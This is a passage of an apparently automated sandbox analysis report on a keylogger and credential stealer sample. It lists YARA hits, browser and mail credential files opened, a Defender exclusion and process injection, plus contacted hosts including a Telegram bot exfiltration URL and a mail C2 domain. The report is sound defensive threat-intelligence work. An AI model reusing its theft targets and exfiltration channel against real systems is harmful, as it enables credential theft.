Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Users\user\Desktop\NXPYoHNSgv.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Users\user\Desktop\NXPYoHNSgv.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000005.00000002.4620367075.0000000003381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 5.2.NXPYoHNSgv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.402d9e0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.4071400.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NXPYoHNSgv.exe PID: 1036, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: NXPYoHNSgv.exe PID: 7000, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 5.2.NXPYoHNSgv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.402d9e0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.4071400.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NXPYoHNSgv.exe PID: 1036, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: NXPYoHNSgv.exe PID: 7000, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 5.2.NXPYoHNSgv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.402d9e0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.4071400.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NXPYoHNSgv.exe PID: 1036, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: NXPYoHNSgv.exe PID: 7000, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000005.00000002.4620367075.0000000003381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 5.2.NXPYoHNSgv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.402d9e0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.4071400.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NXPYoHNSgv.exe PID: 1036, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: NXPYoHNSgv.exe PID: 7000, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 5.2.NXPYoHNSgv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.402d9e0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.4071400.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NXPYoHNSgv.exe PID: 1036, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: NXPYoHNSgv.exe PID: 7000, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528775 Sample: NXPYoHNSgv.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 24 reallyfreegeoip.org 2->24 26 api.telegram.org 2->26 28 3 other IPs or domains 2->28 36 Multi AV Scanner detection for domain / URL 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 46 12 other signatures 2->46 8 NXPYoHNSgv.exe 4 2->8         started        signatures3 42 Tries to detect the country of the analysis system (by using the IP) 24->42 44 Uses the Telegram API (likely for C&C communication) 26->44 process4 file5 22 C:\Users\user\AppData\...22XPYoHNSgv.exe.log, ASCII 8->22 dropped 48 Adds a directory exclusion to Windows Defender 8->48 50 Injects a PE file into a foreign processes 8->50 12 NXPYoHNSgv.exe 15 31 8->12         started        16 powershell.exe 23 8->16         started        signatures6 process7 dnsIp8 30 api.telegram.org 149.154.167.220, 443, 49786 TELEGRAMRU United Kingdom 12->30 32 mail.jhxkgroup.online 217.12.218.219, 49827, 49901, 49930 ITLDC-NLUA Ukraine 12->32 34 2 other IPs or domains 12->34 52 Tries to steal Mail credentials (via file / registry access) 12->52 54 Tries to harvest and steal browser information (history, passwords, etc) 12->54 56 Loading BitLocker PowerShell Module 16->56 18 WmiPrvSE.exe 16->18         started        20 conhost.exe 16->20         started        signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
217.12.218.219
 mail.jhxkgroup.online Ukraine
21100 ITLDC-NLUA true
188.114.96.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true
132.226.247.73
 checkip.dyndns.com United States
16989 UTMEMUS false

Contacted Domains

Name IP Active
reallyfreegeoip.org 188.114.96.3 true
api.telegram.org 149.154.167.220 true
mail.jhxkgroup.online 217.12.218.219 true
checkip.dyndns.com 132.226.247.73 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:035347%0D%0ADate%20and%20Time:%2008/10/2024%20/%2017:20:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20035347%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
    		unknown
    http://checkip.dyndns.org/ false
    • URL Reputation: safe
    		 unknown
    https://reallyfreegeoip.org/xml/8.46.123.33 false
    • URL Reputation: safe
    		 unknown